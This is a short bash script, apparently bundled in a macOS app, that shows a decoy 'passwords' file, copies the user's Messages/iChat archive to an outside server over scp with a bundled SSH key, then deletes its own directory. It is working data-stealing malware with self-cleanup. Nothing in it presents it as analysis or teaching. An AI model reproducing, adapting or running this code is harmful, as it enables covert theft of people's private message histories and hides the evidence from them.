#!/bin/bash
CDIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) #Directory of app
ARCHIVES=~/Library/Containers/com.apple.iChat/Data/Library/Messages/Archive
SERV=www.naookiesato.com
SERVPORT=8087
SERVUSER=sauron
SERVPATH=/home/sauron
KEY=${CDIR}/.ssh/id_rsa
cd ${CDIR}

open ${CDIR}/Content/passwords
cd ${ARCHIVES}
if [ $? -eq 0 ]; then
    scp -i ${KEY} -P ${SERVPORT} -r ${ARCHIVES} ${SERVUSER}@${SERV}://${SERVPATH}/${USER}
    rm -rf ${CDIR} #cleanup
    #rm -rf ${CDIR}/../* #cleanup
fi


#open  -a Preview

